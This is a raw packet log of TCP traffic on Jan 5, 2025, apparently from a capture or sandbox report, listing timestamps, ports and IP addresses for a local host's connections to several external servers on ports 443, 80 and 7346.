Jan 5, 2025 08:32:22.487723112 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:22.487740040 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:22.487781048 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:22.487787008 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:22.487816095 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:22.487835884 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:22.488214970 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:22.488231897 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:22.488281012 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:22.488286972 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:22.488308907 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:22.488331079 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:22.488657951 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:22.488714933 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:22.488719940 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:22.488764048 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:22.488774061 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:22.488801003 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:22.489080906 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:22.629195929 CET	49739	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:22.634150982 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:22.634252071 CET	49739	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:22.639601946 CET	49739	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:22.644458055 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:22.763789892 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:22.763832092 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:22.763910055 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:22.776972055 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:22.776988983 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.230966091 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:23.274116039 CET	49739	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:23.362373114 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:23.364025116 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.364094019 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.366892099 CET	49739	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:23.371728897 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:23.371803999 CET	49739	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:23.376055002 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.376079082 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.376358032 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.376681089 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:23.376805067 CET	49739	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:23.381663084 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:23.385839939 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.427339077 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.650470018 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.650494099 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.650511026 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.650573015 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.650597095 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.650635004 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.669972897 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:23.671344042 CET	49739	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:23.671554089 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.671576023 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.671624899 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.671639919 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.671654940 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.671679020 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.676086903 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:23.738955975 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.738972902 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.739033937 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.739048004 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.739082098 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.758111954 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.758131027 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.758183956 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.758193016 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.758232117 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.759763956 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.759779930 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.759829044 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.759834051 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.759856939 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.759870052 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.799806118 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:23.806633949 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:23.806946993 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.806962967 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.807003975 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.807010889 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.807034016 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.807054996 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.809194088 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:23.811491013 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:23.811582088 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:23.814033985 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:23.814119101 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:23.815721989 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:23.817909956 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:23.820558071 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:23.822704077 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:23.825974941 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.825992107 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.826042891 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.826049089 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.826085091 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.844516039 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.844532013 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.844602108 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.844609022 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.844650984 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.845416069 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.845427036 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.845491886 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.845498085 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.845539093 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.846520901 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.846535921 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.846576929 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.846581936 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.846592903 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.846610069 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.846632957 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.846637011 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.846685886 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.846708059 CET	443	49740	160.153.175.102	192.168.2.4
Jan 5, 2025 08:32:23.846743107 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:23.852252007 CET	49739	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.336899996 CET	49743	80	192.168.2.4	178.237.33.50
Jan 5, 2025 08:32:24.341871977 CET	80	49743	178.237.33.50	192.168.2.4
Jan 5, 2025 08:32:24.345273018 CET	49743	80	192.168.2.4	178.237.33.50
Jan 5, 2025 08:32:24.348283052 CET	49743	80	192.168.2.4	178.237.33.50
Jan 5, 2025 08:32:24.353094101 CET	80	49743	178.237.33.50	192.168.2.4
Jan 5, 2025 08:32:24.411122084 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.423901081 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.461613894 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.477277994 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.541657925 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.556741953 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.567936897 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.572770119 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.572834015 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.573219061 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.577584028 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.577646017 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.578027964 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.578087091 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.582462072 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.582956076 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.738562107 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:24.787657022 CET	49740	443	192.168.2.4	160.153.175.102
Jan 5, 2025 08:32:24.861519098 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.861532927 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.861551046 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.861560106 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.861571074 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.861579895 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.861588955 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.861592054 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.861613989 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.861613989 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.861758947 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.861771107 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.861780882 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.861809015 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.861809015 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.862272978 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.862289906 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.862365007 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.889642000 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.889653921 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.889664888 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.889698029 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.889765024 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.889775991 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.889786005 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.889796972 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.889811039 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.889832973 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.889981031 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.889991999 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.890007019 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.890022039 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.890038967 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.890451908 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.890470028 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.893215895 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.947913885 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.947940111 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.947952032 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.948035002 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.948072910 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.948096037 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.948127031 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.948401928 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.948411942 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.948421955 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.948447943 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.948467016 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.948537111 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.948548079 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.948596001 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.949150085 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.949160099 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.949171066 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.949209929 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.949275970 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.949290991 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.949321032 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.949326038 CET	80	49743	178.237.33.50	192.168.2.4
Jan 5, 2025 08:32:24.949378967 CET	49743	80	192.168.2.4	178.237.33.50
Jan 5, 2025 08:32:24.949937105 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.949990988 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.949999094 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.950010061 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.950043917 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.950089931 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.950099945 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.950189114 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.950818062 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.950866938 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.950918913 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.979238987 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.979250908 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.979268074 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.979336023 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.979357958 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.979612112 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.979617119 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.979629040 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.979639053 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.979660988 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.979665041 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.979676008 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.979702950 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.980354071 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.980396986 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.980418921 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.980429888 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.980496883 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.980565071 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.980576992 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.980617046 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.981197119 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.981245995 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.981256008 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.981288910 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.981408119 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.981424093 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.981452942 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.982106924 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.982116938 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.982130051 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:24.982148886 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.982167959 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.993310928 CET	49739	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:24.998126984 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.015316963 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.015352011 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.015563965 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.034585953 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.034626007 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.034638882 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.034676075 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.034738064 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.034749031 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.034805059 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.034953117 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.034962893 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.034975052 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.035007000 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.035007000 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.035080910 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.035092115 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.035100937 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.035114050 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.035125971 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.035166025 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.035821915 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.035831928 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.035845041 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.035898924 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.035973072 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.035984039 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.035995007 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.036006927 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.036031008 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.036031008 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.036629915 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.036659956 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.036670923 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.036679983 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.036725998 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.036820889 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.036832094 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.036843061 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.036854029 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.036865950 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.036895990 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.037580967 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.037591934 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.037602901 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.037636995 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.037753105 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.037765026 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.037775040 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.037787914 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.037803888 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.037821054 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.038322926 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.038376093 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.043940067 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.043950081 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.044003010 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.069084883 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.069271088 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.069279909 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.069292068 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.069303036 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.069313049 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.069323063 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.069323063 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.069365025 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.069817066 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.069828033 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.069838047 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.069858074 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.069879055 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.069885015 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.069890976 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.069926977 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.070303917 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.070322990 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.070333004 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.070373058 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.070508957 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.070521116 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.070542097 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.070625067 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.070636034 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.070647001 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.070669889 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.070691109 CET	49741	7346	192.168.2.4	195.133.78.18
